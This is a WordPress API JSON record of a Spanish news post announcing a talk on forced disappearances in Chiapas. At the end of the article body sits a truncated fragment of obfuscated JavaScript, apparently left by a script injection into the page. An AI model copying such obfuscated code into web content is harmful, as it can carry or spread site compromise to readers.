{"id":18397,"date":"2024-10-17T03:47:27","date_gmt":"2024-10-17T03:47:27","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=18397"},"modified":"2024-10-17T03:47:28","modified_gmt":"2024-10-17T03:47:28","slug":"convocan-a-ponencia-sobre-desapariciones-forzadas-en-chiapas","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=18397","title":{"rendered":"Convocan a ponencia sobre desapariciones forzadas en Chiapas"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/10\/IMG-20241016-WA0014-1024x576.jpg\" alt=\"\" class=\"wp-image-18398\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/10\/IMG-20241016-WA0014-1024x576.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/10\/IMG-20241016-WA0014-300x169.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/10\/IMG-20241016-WA0014-768x432.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/10\/IMG-20241016-WA0014-1536x864.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/10\/IMG-20241016-WA0014.jpg 1599w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez\/ Corresponsal<\/p>\n\n\n\n<p>16 de octubre del 2024. San Crist\u00f3bal de Las Casas.- El pr\u00f3ximo viernes 18 de octubre, a las 17 horas, se llevar\u00e1 a cabo una ponencia sobre el tema de las desapariciones forzadas en Chiapas, un evento organizado por el Comit\u00e9 de Consulta y Participaci\u00f3n Ciudadana de esta ciudad.<\/p>\n\n\n\n<p>El encuentro tendr\u00e1 lugar en el emblem\u00e1tico Teatro Zebad\u00faa y ser\u00e1 encabezado por Cristian Antonio Hidalgo Reyes. Al respecto, Eduardo Villatoro Ramos, presidente del Comit\u00e9, destac\u00f3 en entrevista la importancia de este tipo de actividades, se\u00f1alando que las desapariciones forzadas &#8220;son una situaci\u00f3n que puede afectar a cualquier persona&#8221;.<\/p>\n\n\n\n<p>Villatoro tambi\u00e9n subray\u00f3 la necesidad de mejorar el actuar de las autoridades ante este fen\u00f3meno. &#8220;Queremos abrir un espacio de di\u00e1logo con la ciudadan\u00eda para entender mejor c\u00f3mo se encuentra la situaci\u00f3n actual en el estado&#8221;.<\/p>\n\n\n\n<p>&#8220;El evento est\u00e1 dirigido a toda la comunidad y se espera la asistencia de organizaciones civiles, familiares de personas desaparecidas y p\u00fablico en general, interesados en comprender los alcances de esta problem\u00e1tica. Con esta ponencia, el Comit\u00e9 de Consulta y Participaci\u00f3n Ciudadana busca generar mayor conciencia sobre las desapariciones forzadas y crear un puente entre la sociedad y las autoridades para enfrentar juntos esta crisis humanitaria&#8221;, concluy\u00f3.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/ Corresponsal 16 de octubre del 2024. San Crist\u00f3bal de Las Casas.- El pr\u00f3ximo viernes 18 de octubre, a las 17 horas, se llevar\u00e1 a cabo una ponencia sobre el tema de las desapariciones forzadas en Chiapas, un evento organizado por el Comit\u00e9 de Consulta y Participaci\u00f3n Ciudadana de esta ciudad. El encuentro tendr\u00e1 &hellip;<\/p>\n","protected":false},"author":2,"featured_media":18398,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-18397","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/18397","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=18397"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/18397\/revisions"}],"predecessor-version":[{"id":18399,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/18397\/revisions\/18399"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/18398"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=18397"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=18397"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=18397"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}